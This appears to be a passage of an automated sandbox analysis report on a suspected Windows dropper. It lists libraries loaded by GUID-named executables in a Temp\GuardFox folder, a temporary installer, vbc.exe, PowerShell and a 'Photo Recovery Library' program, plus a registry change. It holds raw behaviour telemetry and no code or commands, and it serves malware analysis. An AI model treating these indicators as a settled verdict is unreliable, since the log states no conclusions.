            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mccsusershared.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: msacm32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: winmmbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: winmmbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: explorerframe.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: sfc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: sqlite3.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpWindow found: window name: TMainFormJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
